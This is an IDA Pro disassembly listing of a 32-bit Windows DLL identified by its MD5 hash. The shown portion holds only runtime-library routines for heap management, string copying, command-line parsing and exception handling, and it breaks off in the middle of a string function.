;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 3B628E4BEB3405E758CCDA2542CF8DFB
; File Name : u:\work\3b628e4beb3405e758ccda2542cf8dfb_orig.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 10000000
; Section 1. (virtual address 00001000)
; Virtual size : 000016E4 ( 5860.)
; Section size in file : 00001800 ( 6144.)
; Offset to raw data for section: 00000400
; Flags 60000020: Text Executable Readable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
CODE segment para public 'CODE' use32
assume cs:CODE
;org 10001000h
assume es:nothing, ss:nothing, ds:CODE, fs:nothing, gs:nothing
; [00000006 BYTES: COLLAPSED FUNCTION GetProcessHeap. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION HeapAlloc. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION HeapReAlloc. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION HeapFree. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION FreeLibrary. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION GetModuleFileNameA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION GetModuleHandleA. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION LocalAlloc. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION TlsGetValue. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION TlsSetValue. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION GetCommandLineA. PRESS KEYPAD "+" TO EXPAND]
align 4
loc_10001058: ; DATA XREF: sub_100014A4�o
jmp ds:RaiseException
; ---------------------------------------------------------------------------
align 10h
loc_10001060: ; DATA XREF: sub_100014A4+A�o
jmp ds:RtlUnwind
; ---------------------------------------------------------------------------
align 4
; [00000006 BYTES: COLLAPSED FUNCTION CharNextA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION ExitProcess. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION GetCurrentThreadId. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
sub_10001080 proc near ; CODE XREF: sub_100010D0+4�p
; sub_10001100+3F�p
; DATA XREF: ...
push eax ; dwBytes
mov eax, ds:dwFlags
push eax ; dwFlags
mov eax, ds:hHeap
push eax ; hHeap
call HeapAlloc
retn
sub_10001080 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001094 proc near ; CODE XREF: sub_100010E8+4�p
; sub_10001100+26�p ...
push ebx
mov ebx, eax
push ebx ; lpMem
mov eax, ds:dwFlags
and eax, 1
push eax ; dwFlags
mov eax, ds:hHeap
push eax ; hHeap
call HeapFree
cmp eax, 1
sbb eax, eax
neg eax
and eax, 7Fh
pop ebx
retn
sub_10001094 endp
; =============== S U B R O U T I N E =======================================
sub_100010B8 proc near ; CODE XREF: sub_10001100+D�p
; DATA XREF: DATA:off_10003034�o
push edx ; dwBytes
push eax ; lpMem
mov eax, ds:dwFlags
and eax, 0
push eax ; dwFlags
mov eax, ds:hHeap
push eax ; hHeap
call HeapReAlloc
retn
sub_100010B8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_100010D0 proc near ; CODE XREF: sub_10001690+C�p
; sub_10001DFC+1E3�p
test eax, eax
jz short locret_100010DE
call ds:off_1000302C
or eax, eax
jz short loc_100010DF
locret_100010DE: ; CODE XREF: sub_100010D0+2�j
retn
; ---------------------------------------------------------------------------
loc_100010DF: ; CODE XREF: sub_100010D0+C�j
mov al, 1
jmp loc_100011A8
sub_100010D0 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_100010E8 proc near ; CODE XREF: sub_100015F8+1B�p
; sub_1000161C+20�p ...
test eax, eax
jz short locret_100010F6
call ds:off_10003030
or eax, eax
jnz short loc_100010F7
locret_100010F6: ; CODE XREF: sub_100010E8+2�j
retn
; ---------------------------------------------------------------------------
loc_100010F7: ; CODE XREF: sub_100010E8+C�j
mov al, 2
jmp loc_100011A8
sub_100010E8 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_10001100 proc near ; CODE XREF: sub_100017AC+22�p
; FUNCTION CHUNK AT 100011A8 SIZE 0000000B BYTES
mov ecx, [eax]
test ecx, ecx
jz short loc_10001138
test edx, edx
jz short loc_10001122
push eax
mov eax, ecx
call ds:off_10003034
pop ecx
or eax, eax
jz short loc_10001131
mov [ecx], eax
retn
; ---------------------------------------------------------------------------
loc_1000111B: ; CODE XREF: sub_10001100+2E�j
mov al, 2
jmp loc_100011A8
; ---------------------------------------------------------------------------
loc_10001122: ; CODE XREF: sub_10001100+8�j
mov [eax], edx
mov eax, ecx
call ds:off_10003030
or eax, eax
jnz short loc_1000111B
retn
; ---------------------------------------------------------------------------
loc_10001131: ; CODE XREF: sub_10001100+16�j
; sub_10001100+48�j
mov al, 1
jmp loc_100011A8
; ---------------------------------------------------------------------------
loc_10001138: ; CODE XREF: sub_10001100+4�j
test edx, edx
jz short locret_1000114C
push eax
mov eax, edx
call ds:off_1000302C
pop ecx
or eax, eax
jz short loc_10001131
mov [ecx], eax
locret_1000114C: ; CODE XREF: sub_10001100+3A�j
retn
sub_10001100 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_10001150 proc near ; CODE XREF: sub_1000115C+42�p
mov ds:dword_10003004, edx
call sub_100015E0
sub_10001150 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_1000115C proc near ; CODE XREF: sub_10001100+AE�j
push ebx
push esi
mov esi, edx
mov ebx, eax
and bl, 7Fh
cmp ds:dword_10004004, 0
jz short loc_10001178
mov edx, esi
mov eax, ebx
call ds:dword_10004004
loc_10001178: ; CODE XREF: sub_1000115C+10�j
test bl, bl
jnz short loc_10001189
call sub_10001974
mov ebx, [eax+0]
jmp short loc_10001198
; ---------------------------------------------------------------------------
loc_10001189: ; CODE XREF: sub_1000115C+1E�j
cmp bl, 18h
ja short loc_10001198
xor eax, eax
mov al, bl
mov bl, ds:byte_10003038[eax]
loc_10001198: ; CODE XREF: sub_1000115C+2B�j
; sub_1000115C+30�j
xor eax, eax
mov al, bl
mov edx, esi
call sub_10001150
sub_1000115C endp
; ---------------------------------------------------------------------------
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_10001100
loc_100011A8: ; CODE XREF: sub_100010D0+11�j
; sub_100010E8+11�j ...
and eax, 7Fh
mov edx, [esp+0]
jmp sub_1000115C
; END OF FUNCTION CHUNK FOR sub_10001100
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_100011B4 proc near ; CODE XREF: sub_1000164C+1B�p
; sub_100016BC+1C�p ...
cmp ecx, 4
jge short loc_100011D5
jcxz locret_10001213
cmp eax, edx
jz short locret_10001213
push esi
push edi
mov esi, eax
mov edi, edx
ja short loc_100011D1
lea esi, [ecx+esi-1]
lea edi, [ecx+edi-1]
std
loc_100011D1: ; CODE XREF: sub_100011B4+12�j
rep movsb
jmp short loc_10001201
; ---------------------------------------------------------------------------
loc_100011D5: ; CODE XREF: sub_100011B4+3�j
cmp eax, edx
jz short locret_10001213
push esi
push edi
mov esi, eax
mov edi, edx
mov eax, ecx
ja short loc_10001203
and ecx, 3
lea esi, [eax+esi-1]
lea edi, [eax+edi-1]
std
rep movsb
sar eax, 2
mov ecx, eax
mov eax, 3
sub esi, eax
sub edi, eax
rep movsd
loc_10001201: ; CODE XREF: sub_100011B4+1F�j
cld
dec ecx
loc_10001203: ; CODE XREF: sub_100011B4+2D�j
sar ecx, 2
js short loc_10001211
rep movsd
and eax, 3
mov ecx, eax
rep movsb
loc_10001211: ; CODE XREF: sub_100011B4+52�j
pop edi
pop esi
locret_10001213: ; CODE XREF: sub_100011B4+5�j
; sub_100011B4+A�j ...
retn
sub_100011B4 endp
; =============== S U B R O U T I N E =======================================
sub_10001214 proc near ; CODE XREF: sub_10001300+41�p
push ebx
push esi
push edi
push ebp
mov esi, edx
mov ebx, eax
jmp short loc_10001226
; ---------------------------------------------------------------------------
loc_1000121E: ; CODE XREF: sub_10001214+1A�j
push ebx ; lpsz
call CharNextA ; CharNextA
mov ebx, eax
loc_10001226: ; CODE XREF: sub_10001214+8�j
; sub_10001214+2A�j
mov al, [ebx]
test al, al
jz short loc_10001230
cmp al, 20h
jbe short loc_1000121E
loc_10001230: ; CODE XREF: sub_10001214+16�j
cmp byte ptr [ebx], 22h
jnz short loc_10001240
cmp byte ptr [ebx+1], 22h
jnz short loc_10001240
add ebx, 2
jmp short loc_10001226
; ---------------------------------------------------------------------------
loc_10001240: ; CODE XREF: sub_10001214+1F�j
; sub_10001214+25�j
xor ebp, ebp
mov edi, ebx
jmp short loc_10001289
; ---------------------------------------------------------------------------
loc_10001246: ; CODE XREF: sub_10001214+79�j
cmp al, 22h
jnz short loc_1000127B
push ebx ; lpsz
call CharNextA ; CharNextA
mov ebx, eax
jmp short loc_10001262
; ---------------------------------------------------------------------------
loc_10001254: ; CODE XREF: sub_10001214+56�j
push ebx ; lpsz
call CharNextA ; CharNextA
mov edx, eax
sub edx, ebx
add ebp, edx
mov ebx, eax
loc_10001262: ; CODE XREF: sub_10001214+3E�j
mov al, [ebx]
test al, al
jz short loc_1000126C
cmp al, 22h
jnz short loc_10001254
loc_1000126C: ; CODE XREF: sub_10001214+52�j
cmp byte ptr [ebx], 0
jz short loc_10001289
push ebx ; lpsz
call CharNextA ; CharNextA
mov ebx, eax
jmp short loc_10001289
; ---------------------------------------------------------------------------
loc_1000127B: ; CODE XREF: sub_10001214+34�j
push ebx ; lpsz
call CharNextA ; CharNextA
mov edx, eax
sub edx, ebx
add ebp, edx
mov ebx, eax
loc_10001289: ; CODE XREF: sub_10001214+30�j
; sub_10001214+5B�j ...
mov al, [ebx]
cmp al, 20h
ja short loc_10001246
mov eax, esi
mov edx, ebp
call sub_100017AC
mov ebx, edi
mov edi, [esi]
xor esi, esi
jmp short loc_100012F1
; ---------------------------------------------------------------------------
loc_100012A0: ; CODE XREF: sub_10001214+E1�j
cmp al, 22h
jnz short loc_100012DC
push ebx ; lpsz
call CharNextA ; CharNextA
mov ebx, eax
jmp short loc_100012C3
; ---------------------------------------------------------------------------
loc_100012AE: ; CODE XREF: sub_10001214+B7�j
push ebx ; lpsz
call CharNextA ; CharNextA
cmp eax, ebx
jbe short loc_100012C3
loc_100012B8: ; CODE XREF: sub_10001214+AD�j
mov dl, [ebx]
mov [edi+esi], dl
inc ebx
inc esi
cmp eax, ebx
ja short loc_100012B8
loc_100012C3: ; CODE XREF: sub_10001214+98�j
; sub_10001214+A2�j
mov al, [ebx]
test al, al
jz short loc_100012CD
cmp al, 22h
jnz short loc_100012AE
loc_100012CD: ; CODE XREF: sub_10001214+B3�j
cmp byte ptr [ebx], 0
jz short loc_100012F1
push ebx ; lpsz
call CharNextA ; CharNextA
mov ebx, eax
jmp short loc_100012F1
; ---------------------------------------------------------------------------
loc_100012DC: ; CODE XREF: sub_10001214+8E�j
push ebx ; lpsz
call CharNextA ; CharNextA
cmp eax, ebx
jbe short loc_100012F1
loc_100012E6: ; CODE XREF: sub_10001214+DB�j
mov dl, [ebx]
mov [edi+esi], dl
inc ebx
inc esi
cmp eax, ebx
ja short loc_100012E6
loc_100012F1: ; CODE XREF: sub_10001214+8A�j
; sub_10001214+BC�j ...
mov al, [ebx]
cmp al, 20h
ja short loc_100012A0
mov eax, ebx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_10001214 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_10001300 proc near ; CODE XREF: sub_10001DFC+31E�p
Filename = byte ptr -114h
push ebx
push esi
push edi
add esp, 0FFFFFEF8h
mov ebx, edx
mov esi, eax
mov eax, ebx
call sub_100015F8
test esi, esi
jnz short loc_10001336
push 105h ; nSize
lea eax, [esp+118h+Filename]
push eax ; lpFilename
push 0 ; hModule
call GetModuleFileNameA ; GetModuleFileNameA
mov ecx, eax
mov edx, esp
mov eax, ebx
call sub_100016BC
jmp short loc_10001354
; ---------------------------------------------------------------------------
loc_10001336: ; CODE XREF: sub_10001300+16�j
call GetCommandLineA ; GetCommandLineA
mov edi, eax
loc_1000133D: ; CODE XREF: sub_10001300+52�j
mov edx, ebx
mov eax, edi
call sub_10001214
mov edi, eax
test esi, esi
jz short loc_10001354
cmp dword ptr [ebx], 0
jz short loc_10001354
dec esi
jmp short loc_1000133D
; ---------------------------------------------------------------------------
loc_10001354: ; CODE XREF: sub_10001300+34�j
; sub_10001300+4A�j ...
add esp, 108h
pop edi
pop esi
pop ebx
retn
sub_10001300 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_10001360 proc near ; CODE XREF: sub_10001A8C+2�p
; sub_10001BA0+7E�p
push edi
mov edi, eax
mov ch, cl
mov eax, ecx
shl eax, 10h
mov ax, cx
mov ecx, edx
sar ecx, 2
js short loc_1000137D
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
loc_1000137D: ; CODE XREF: sub_10001360+12�j
pop edi
retn
sub_10001360 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_10001380 proc near ; CODE XREF: sub_100013A0+C�p
test ecx, ecx
jz short locret_1000139D
mov eax, [ecx+1]
cmp byte ptr [ecx], 0E9h
jz short loc_10001398
cmp byte ptr [ecx], 0EBh
jnz short locret_1000139D
movsx eax, al
inc ecx
inc ecx
jmp short loc_1000139B
; ---------------------------------------------------------------------------
loc_10001398: ; CODE XREF: sub_10001380+A�j
add ecx, 5
loc_1000139B: ; CODE XREF: sub_10001380+16�j
add ecx, eax
locret_1000139D: ; CODE XREF: sub_10001380+2�j
; sub_10001380+F�j
retn
sub_10001380 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_100013A0 proc near ; CODE XREF: sub_10001DFC-A0F�p
cmp ds:byte_10003008, 1
jbe short locret_100013C6
push eax
push edx
push ecx
call sub_10001380
push ecx
push esp
push 1
push 0
push 0EEDFAE1h
call ds:dword_10004008
pop ecx
pop ecx
pop edx
pop eax
locret_100013C6: ; CODE XREF: sub_100013A0+7�j
retn
sub_100013A0 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_10001DFC
loc_100013C8: ; CODE XREF: sub_100018A4:loc_100018E0�j
; sub_10001A04:loc_10001A29�j ...
mov eax, [esp-4+arg_0]
mov edx, [esp-4+arg_4]
test dword ptr [eax+4], 6
jz short loc_100013F8
mov ecx, [edx+4]
mov dword ptr [edx+4], offset loc_100013F8
push ebx
push esi
push edi
push ebp
mov ebp, [edx+8]
add ecx, 5
call sub_100013A0
call ecx
pop ebp
pop edi
pop esi
pop ebx
loc_100013F8: ; CODE XREF: sub_10001DFC-A25�j
; DATA XREF: sub_10001DFC-A20�o
mov eax, 1
retn
; END OF FUNCTION CHUNK FOR sub_10001DFC
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_10001400 proc near ; CODE XREF: sub_10001510:loc_1000155E�p
; DATA XREF: DATA:off_1000301C�o
push ebx
push esi
push edi
push ebp
mov edi, offset dword_1000402C
mov eax, [edi+8]
test eax, eax
jz short loc_1000142E
mov ebx, [edi+0Ch]
mov esi, [eax+4]
test ebx, ebx
jle short loc_1000142E
loc_1000141A: ; CODE XREF: sub_10001400+2C�j
dec ebx
mov [edi+0Ch], ebx
mov eax, [esi+ebx*8+4]
test eax, eax
jz short loc_1000142A
mov ebp, eax
call ebp
loc_1000142A: ; CODE XREF: sub_10001400+24�j
test ebx, ebx
jg short loc_1000141A
loc_1000142E: ; CODE XREF: sub_10001400+E�j
; sub_10001400+18�j
pop ebp
pop edi
pop esi
pop ebx
retn
sub_10001400 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001434 proc near ; CODE XREF: sub_10001434+43�p
; sub_10001488+12�p
; DATA XREF: ...
push ebx
push esi
push edi
push ebp
mov edi, ecx
mov ebp, edx
mov esi, eax
mov eax, offset sub_10001434
cmp eax, ds:off_10003018
setz bl
cmp edi, ebp
jle short loc_10001483
loc_10001450: ; CODE XREF: sub_10001434+4D�j
mov eax, [esi+ebp*8]
inc ebp
mov ds:dword_10004038, ebp
test eax, eax
jz short loc_10001460
call eax
loc_10001460: ; CODE XREF: sub_10001434+28�j
test bl, bl
jz short loc_1000147F
mov eax, offset sub_10001434
cmp eax, ds:off_10003018
jz short loc_1000147F
mov ecx, edi
mov edx, ebp
mov eax, esi
call ds:off_10003018
jmp short loc_10001483
; ---------------------------------------------------------------------------
loc_1000147F: ; CODE XREF: sub_10001434+2E�j
; sub_10001434+3B�j
cmp edi, ebp
jg short loc_10001450
loc_10001483: ; CODE XREF: sub_10001434+1A�j
; sub_10001434+49�j
pop ebp
pop edi
pop esi
pop ebx
retn
sub_10001434 endp
; =============== S U B R O U T I N E =======================================
sub_10001488 proc near ; CODE XREF: sub_100014A4+35�p
mov eax, ds:dword_10004034
test eax, eax
jz short locret_100014A0
mov edx, [eax]
xor ecx, ecx
mov eax, [eax+4]
xchg ecx, edx
call ds:off_10003018
locret_100014A0: ; CODE XREF: sub_10001488+7�j
retn
sub_10001488 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_100014A4 proc near ; CODE XREF: sub_100019C0+3A�p
mov ds:dword_10004008, offset loc_10001058
mov ds:dword_1000400C, offset loc_10001060
mov ds:dword_10004034, eax
xor eax, eax
mov ds:dword_10004038, eax
mov ds:dword_1000403C, edx
mov eax, [edx+4]
mov ds:dword_10004014, eax
mov ds:byte_1000401C, 0
call sub_10001488
retn
sub_100014A4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_100014E0 proc near ; CODE XREF: sub_10001510+96�p
xor eax, eax
xchg eax, ds:dword_10003000
neg eax
sbb eax, eax
inc eax
mov edi, offset dword_1000402C
mov ebx, [edi+18h]
mov ebp, [edi+14h]
push dword ptr [edi+1Ch]
push dword ptr [edi+20h]
mov esi, [edi]
mov ecx, 0Bh
rep movsd
pop edi
pop esi
leave
retn 0Ch
sub_100014E0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_10001510 proc near ; CODE XREF: sub_100015E0+5�p
; sub_100023AC+255�p
push ebx
push esi
push edi
push ebp
mov ebx, offset dword_1000402C
mov esi, offset dword_10003000
mov edi, offset dword_10004020
cmp byte ptr [ebx+28h], 0
jnz short loc_1000153F
cmp dword ptr [edi], 0
jz short loc_1000153F
loc_1000152E: ; CODE XREF: sub_10001510+2D�j
mov edx, [edi]
mov eax, edx
xor edx, edx
mov [edi], edx
mov ebp, eax
call ebp
cmp dword ptr [edi], 0
jnz short loc_1000152E
loc_1000153F: ; CODE XREF: sub_10001510+17�j
; sub_10001510+1C�j
cmp ds:dword_10003004, 0
jz short loc_1000154E
call ds:off_10003054
loc_1000154E: ; CODE XREF: sub_10001510+36�j
; sub_10001510+C6�j
cmp byte ptr [ebx+28h], 2
jnz short loc_1000155E
cmp dword ptr [esi], 0
jnz short loc_1000155E
xor eax, eax
mov [ebx+0Ch], eax
loc_1000155E: ; CODE XREF: sub_10001510+42�j
; sub_10001510+47�j
call ds:off_1000301C
cmp byte ptr [ebx+28h], 1
jbe short loc_1000156F
cmp dword ptr [esi], 0
jz short loc_10001591
loc_1000156F: ; CODE XREF: sub_10001510+58�j
mov eax, [ebx+10h]
test eax, eax
jz short loc_10001591
call ds:off_10003014
mov edx, [ebx+10h]
mov eax, [edx+10h]
cmp eax, [edx+4]
jz short loc_10001591
test eax, eax
jz short loc_10001591
push eax ; hLibModule
call FreeLibrary ; FreeLibrary
loc_10001591: ; CODE XREF: sub_10001510+5D�j
; sub_10001510+64�j ...
call ds:off_10003020
cmp byte ptr [ebx+28h], 1
jnz short loc_100015A0
call dword ptr [ebx+24h]
loc_100015A0: ; CODE XREF: sub_10001510+8B�j
cmp byte ptr [ebx+28h], 0
jz short loc_100015AB
call sub_100014E0
loc_100015AB: ; CODE XREF: sub_10001510+94�j
cmp dword ptr [ebx], 0
jnz short loc_100015C7
cmp ds:dword_10004010, 0
jz short loc_100015BF
call ds:dword_10004010
loc_100015BF: ; CODE XREF: sub_10001510+A7�j
mov eax, [esi]
push eax ; uExitCode
call ExitProcess ; ExitProcess
; ---------------------------------------------------------------------------
loc_100015C7: ; CODE XREF: sub_10001510+9E�j
mov eax, [ebx]
push esi
mov esi, eax
mov edi, ebx
mov ecx, 0Bh
rep movsd
pop esi
jmp loc_1000154E
sub_10001510 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
pop ebp
pop edi
pop esi
pop ebx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_100015E0 proc near ; CODE XREF: sub_10001150+6�p
; sub_100015EC+6�j
mov ds:dword_10003000, eax
call sub_10001510
sub_100015E0 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_100015EC proc near ; CODE XREF: sub_10001930+1A�p
; sub_10001930+2F�p
pop ds:dword_10003004
jmp sub_100015E0
sub_100015EC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_100015F8 proc near ; CODE XREF: sub_10001300+F�p
; sub_100016BC+23�p ...
mov edx, [eax]
test edx, edx
jz short locret_10001619
mov dword ptr [eax], 0
mov ecx, [edx-8]
dec ecx
jl short locret_10001619
dec dword ptr [edx-8]
jnz short locret_10001619
push eax
lea eax, [edx-8]
call sub_100010E8
pop eax
locret_10001619: ; CODE XREF: sub_100015F8+4�j
; sub_100015F8+10�j ...
retn
sub_100015F8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_1000161C proc near ; CODE XREF: sub_10001CAC+B1�p
; sub_10001DFC+429�p ...
push ebx
push esi
mov ebx, eax
mov esi, edx
loc_10001622: ; CODE XREF: sub_1000161C+29�j
mov edx, [ebx]
test edx, edx
jz short loc_10001641
mov dword ptr [ebx], 0
mov ecx, [edx-8]
dec ecx
jl short loc_10001641
dec dword ptr [edx-8]
jnz short loc_10001641
lea eax, [edx-8]
call sub_100010E8
loc_10001641: ; CODE XREF: sub_1000161C+A�j
; sub_1000161C+16�j ...
add ebx, 4
dec esi
jnz short loc_10001622
pop esi
pop ebx
retn
sub_1000161C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_1000164C proc near ; CODE XREF: sub_10001704+8�j
; sub_10001CAC+97�p ...
test edx, edx
jz short loc_10001673
mov ecx, [edx-8]
inc ecx
jg short loc_10001670
push eax
push edx
mov eax, [edx-4]
call sub_10001690
mov edx, eax
pop eax
push edx
mov ecx, [eax-4]
call sub_100011B4
pop edx
pop eax
jmp short loc_10001673
; ---------------------------------------------------------------------------
loc_10001670: ; CODE XREF: sub_1000164C+8�j
inc dword ptr [edx-8]
loc_10001673: ; CODE XREF: sub_1000164C+2�j
; sub_1000164C+22�j
xchg edx, [eax]
test edx, edx
jz short locret_1000168C
mov ecx, [edx-8]
dec ecx
jl short locret_1000168C
dec dword ptr [edx-8]
jnz short locret_1000168C
lea eax, [edx-8]
call sub_100010E8
locret_1000168C: ; CODE XREF: sub_1000164C+2B�j
; sub_1000164C+31�j ...
retn
sub_1000164C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_10001690 proc near ; CODE XREF: sub_1000164C+F�p
; sub_100016BC+B�p ...
test eax, eax
jle short loc_100016B8
push eax
add eax, 0Ah
and eax, 0FFFFFFFEh
push eax
call sub_100010D0
pop edx
mov word ptr [edx+eax-2], 0
add eax, 8
pop edx
mov [eax-4], edx
mov dword ptr [eax-8], 1
retn
; ---------------------------------------------------------------------------
loc_100016B8: ; CODE XREF: sub_10001690+2�j
xor eax, eax
retn
sub_10001690 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_100016BC proc near ; CODE XREF: sub_10001300+2F�p
; sub_100016EC+8�p
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
mov edi, ecx
mov eax, edi
call sub_10001690
mov ecx, edi
mov edi, eax
test esi, esi
jz short loc_100016DD
mov edx, eax
mov eax, esi
call sub_100011B4
loc_100016DD: ; CODE XREF: sub_100016BC+16�j
mov eax, ebx
call sub_100015F8
mov [ebx], edi
pop edi
pop esi
pop ebx
retn
sub_100016BC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_100016EC proc near ; CODE XREF: sub_10001BA0+90�p
push edx
mov edx, esp
mov ecx, 1
call sub_100016BC
pop edx
retn
sub_100016EC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_100016FC proc near ; CODE XREF: sub_10001CAC+38�p
; sub_10001CAC+7F�p
test eax, eax
jz short locret_10001703
mov eax, [eax-4]
locret_10001703: ; CODE XREF: sub_100016FC+2�j
retn
sub_100016FC endp
; =============== S U B R O U T I N E =======================================
sub_10001704 proc near ; CODE XREF: sub_10001BA0+9A�p
test edx, edx
jz short locret_10001747
mov ecx, [eax]
test ecx, ecx
jz sub_1000164C
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
mov edi, [ecx-4]
mov edx, [esi-4]
add edx, edi
cmp esi, ecx
jz short loc_1000173C
call sub_100017AC
mov eax, esi
mov ecx, [esi-4]
loc_1000172F: ; CODE XREF: sub_10001704+41�j
mov edx, [ebx]
add edx, edi
call sub_100011B4
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_1000173C: ; CODE XREF: sub_10001704+1F�j
call sub_100017AC
mov eax, [ebx]
mov ecx, edi
jmp short loc_1000172F
; ---------------------------------------------------------------------------
locret_10001747: ; CODE XREF: sub_10001704+2�j
retn
sub_10001704 endp
; =============== S U B R O U T I N E =======================================
sub_10001748 proc near ; CODE XREF: sub_10001AE0+F�p
; sub_10001BA0+14�p ...
test eax, eax
jz short locret_10001755
mov edx, [eax-8]
inc edx
jle short locret_10001755
inc dword ptr [eax-8]
locret_10001755: ; CODE XREF: sub_10001748+2�j
; sub_10001748+8�j
retn
sub_10001748 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001758 proc near ; CODE XREF: sub_10001DFC+3F�p
; sub_10001DFC+68�p ...
test eax, eax
jz short loc_1000175E
retn
; ---------------------------------------------------------------------------
byte_1000175D db 0 ; DATA XREF: sub_10001758:loc_1000175E�o
; ---------------------------------------------------------------------------
loc_1000175E: ; CODE XREF: sub_10001758+2�j
mov eax, offset byte_1000175D
retn
sub_10001758 endp
; =============== S U B R O U T I N E =======================================
sub_10001764 proc near ; CODE XREF: sub_100017A4�j
mov edx, [eax]
test edx, edx
jz short loc_100017A1
mov ecx, [edx-8]
dec ecx
jz short loc_100017A1
push ebx
mov ebx, eax
mov eax, [edx-4]
call sub_10001690
mov edx, eax
mov eax, [ebx]
mov [ebx], edx
push eax
mov ecx, [eax-4]
call sub_100011B4
pop eax
mov ecx, [eax-8]
dec ecx
jl short loc_1000179E
dec dword ptr [eax-8]
jnz short loc_1000179E
lea eax, [eax-8]
call sub_100010E8
loc_1000179E: ; CODE XREF: sub_10001764+2B�j
; sub_10001764+30�j
mov edx, [ebx]
pop ebx
loc_100017A1: ; CODE XREF: sub_10001764+4�j
; sub_10001764+A�j
mov eax, edx
retn
sub_10001764 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_100017A4 proc near ; CODE XREF: sub_10001AE0+34�p
; sub_10001AE0+67�p ...
jmp sub_10001764
sub_100017A4 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_100017AC proc near ; CODE XREF: sub_10001214+7F�p
; sub_10001704+21�p ...
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
xor edi, edi
test edx, edx
jle short loc_10001801
mov eax, [ebx]
test eax, eax
jz short loc_100017E2
cmp dword ptr [eax-8], 1
jnz short loc_100017E2
sub eax, 8
add edx, 9
push eax
mov eax, esp
call sub_10001100
pop eax
add eax, 8
mov [ebx], eax
mov [eax-4], esi
mov byte ptr [esi+eax], 0
jmp short loc_1000180A
